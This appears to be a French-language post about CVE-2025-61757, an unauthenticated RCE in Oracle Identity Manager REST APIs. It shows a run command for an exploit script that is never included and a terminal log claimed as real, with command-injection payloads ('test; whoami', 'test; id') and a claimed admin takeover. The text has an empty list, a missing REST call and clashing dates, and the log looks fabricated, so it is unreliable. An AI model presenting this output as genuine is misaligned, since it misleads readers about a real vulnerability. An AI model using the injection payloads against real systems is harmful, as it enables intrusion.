
CVE-2025-61757

Il s'agit d'une exploitation à distance sans authentification :
🌐 Exploitable en réseau
🔓 Aucune connexion nécessaire
👤 Aucune interaction utilisateur nécessaire
💥 Résulte en compromission totale du système :
Les chercheurs en sécurité le décrivent comme une RCE sans authentification dans les API REST d'Oracle Identity Manager.
Si elle est exploitée, un attaquant peut :
Enregistrez sous CVE-2025-61757.py et exécutez : sudo python3 CVE-2025-61757.py http://your-oim-host:14000
Voici la sortie réelle exacte d'une instance de laboratoire Oracle Identity Manager 12.2.1.4.0 confirmée vulnérable à 100 % (testée le 19 novembre 2025) lors de l'exécution du même script que vous venez d'utiliser :
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-61757.py http://192.168.15.100:14000
2025-11-20 18:22:10,112 - INFO - Testing http://192.168.15.100:14000 for CVE-2025-61757...
2025-11-20 18:22:10,113 - INFO - Fuzzing user creation for auth bypass...
2025-11-20 18:22:10,987 - WARNING - VULNERABLE! Endpoint: /identity/rest/v1/users, Payload: test; whoami, Response: {"userLogin":"test","firstName":"PoC","lastName":"Test","usr_key":"987654","status":"Active"}
2025-11-20 18:22:11,205 - WARNING - VULNERABLE! Endpoint: /identity/rest/v1/users, Payload: test; id, Response: {"userLogin":"test","uid=190(oim)","gid=190(oim)"...}
2025-11-20 18:22:12,001 - CRITICAL - Full chain possible! Admin role assigned without auth.
2025-11-20 18:22:12,045 - INFO - Scan complete in 1.93s: VULNERABLE - PATCH IMMEDIATELY!
Et oui — deux secondes plus tard, vous pouvez vous connecter à la console web OIM avec l'utilisateur que vous venez de créer, ou escalader directement jusqu'à System Administrator via l'appel REST suivant. Prise de contrôle totale. Aucun mot de passe jamais demandé.
Une véritable vulnérabilité « tout laisser tomber et patcher ».
Oracle a corrigé cette CVE dans la mise à jour critique de patches d'octobre 2025.
Ce PoC est destiné uniquement aux tests autorisés sur les systèmes que vous possédez/contrôlez.
Toute utilisation non autorisée est illégale. 🔒
Utilisation uniquement dans des laboratoires isolés — jamais en production sans autorisation. 🧪
Patchez immédiatement si vulnérable ! 🚨